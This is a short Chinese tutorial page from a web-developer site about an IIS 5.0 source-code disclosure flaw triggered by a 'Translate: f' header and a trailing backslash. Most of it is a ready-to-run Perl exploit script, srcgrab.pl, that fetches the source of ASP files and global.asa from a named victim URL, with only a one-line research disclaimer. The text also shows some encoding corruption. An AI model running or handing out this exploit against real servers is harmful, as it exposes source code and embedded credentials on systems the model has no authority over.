iis5的asp泄露 - 中国WEB开发者网络 (http://www.webasp.net) -- 技术教程 (http://www.webasp.net/article/) --- iis5的asp泄露 (http://www.webasp.net/article/18/17323.htm) |
| -- 作者:未知 -- 发布日期: 2005-04-05 |
| iis5的asp泄露
当 IIS 5.0 接收到一个特殊格式的头 (Translate: f) 的 HTTP 请求,同时 UR L 末尾包含一个特殊字符时,IIS 会使用错误的处理方法导致文件源代码泄漏。 以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自 负 #!/usr/bin/perl # Expl0it By smiler@vxd.org # Tested with sucess against IIS 5.0. Maybe it works against IIS 4.0 u sing a shared drive but I haven磘 tested it yet. # Get the source code of any script from the server using this exploit . # This code was written after Daniel Docekal brought this issue in Bug Traq. # Cheers 351 and FractalG :) if (not $ARGV[0]) { print qq~ Geee it磗 running !! kewl :))) Usage : srcgrab.pl Example Usage : srcgrab.pl http://www.victimsite.co m/global.asa U can also save the retrieved file using : srcgrab.pl http://www.victi m.com/default.asp > file_to_save ~; exit;} $victimurl=$ARGV[0]; # Create a user agent object use LWP::UserAgent; $ua = new LWP::UserAgent; # Create a request my $req = new HTTP::Request GET => $victimurl . '\\'; # Here is the ba ckslash at the end of the url ;) $req->content_type('application/x-www-form-urlencoded'); $req->content_type('text/html'); $req->header(Translate => 'f'); # Here is the famous translate header :)) $req->content('match=www&errors=0'); # Pass request to the user agent and get a response back my $res = $ua->request($req); # Check the outcome of the response if ($res->is_success) { print $res->content; } else { print $res->error_as_HTML; } |
| webasp.net |